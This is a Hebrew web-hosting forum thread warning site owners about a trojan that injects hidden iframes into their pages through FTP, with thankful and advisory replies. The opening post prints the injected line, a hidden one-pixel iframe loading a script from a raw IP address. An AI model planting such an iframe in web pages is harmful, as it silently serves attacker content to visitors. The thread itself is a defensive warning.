|
התראת וירוסים חמורה באתרים
שלום לכל המשתמשים,
התראה זו מתייחסת לגולשים ולבעלי אתרים כאחד. לאחרונה התקבלו אצלי (sPD Hosting) מספר פניות בנוגע לוירוס ש"קופץ" כאשר פותחים את האתר, במידה ואתם נתקלים באחד כזה (בהנחה כמובן שמותקן אצלכם אנטי-וירוס ומתעדכן בקביעות) חשוב לציין שלא מדובר בוירוס כלשהוא ע"ג השרת עליו מתאכסן השרת או בפעולה מתוכננת מצד בעל האתר. מדובר בסוס טרויאני המושתל במחשבו של בעל האתר, כאשר בעל האתר משתמש בFTP הוירוס אוטומטית מוסף לקוד המקור של האתר, לרוב בעמודים בשמות: index.php, default.asp או קבצים מרכזיים אחרים. הוירוס מצורף לאתר בתור IFrame, לרוב מיד לאחר תג הbody. דוגמא: קוד:
<iframe src='http://62.176.16.19/tt.php' width='1' height='1' style='visibility: hidden;'></iframe>למידע על הוירוסים: Trojan-Clicker.HTML.IFrame.g Trojan-Clicker.HTML.IFrame.fq אם יש שמות נוספים לוירוסים, אשמח אם משתמשים נוספים יוסיפו מידע, יעודכן כאן בפוסט הראשי. האנטי-וירוס Kaspersky 7 מזהה אותו מצויין, לגבי תוכנות אנטי-וירוס נוספות, שום מושג. |
תודה רבה לך על האזהרה!
|
תודה רבה. ויש אפשרות להוציא אותו מהקוד מקור, ושלא יחזור לשם?
|
בעע בדיוק קפץ לי הAVG עם ההודעה:
קובץ מסוג PDF (של ADOBE מסמכים) Downloader.Zlob.LI מוכר לכם? זו דרך מאוד חכמה מעניין מאוד איך הם עורכים את הקובץ ועושים את כל זה. |
לפני שניה הנורטון ביקש לעשות בדיקה אם הרשת וזה נתן לו איקס
בדיוק שנכנסתי! עריכה: נורטון 2008 סיקרוטי משהו.. |
תודה על העדכון.
ולDodem נראה לי שכן,אבל זה יחזור. |
אפשר למחוק אותו מהקוד,
אבל אם הוירוס עדין קיים במחשב של בעל האתר (יותר נכון, מי שמעלה אותו לFTP), הוירוס יחזור. |
זה ווירוס דיי ישן...עוד זוכר לפני כמה חודשים מישהו פתח פה אשכול על זה...פעם גם ב siz.co.il היה את זה... ובעוד כמה אתרים של משתמשים פה בפורום... בכל מקרה תודה על העדכון :)
|
תודה רבה על האזהרה :)
|
תודה על האזהרה...
|
| כל הזמנים הם GMT +2. הזמן כעת הוא 02:26. |
מופעל באמצעות VBulletin גרסה 3.8.6
כל הזכויות שמורות ©
כל הזכויות שמורות לסולל יבוא ורשתות (1997) בע"מ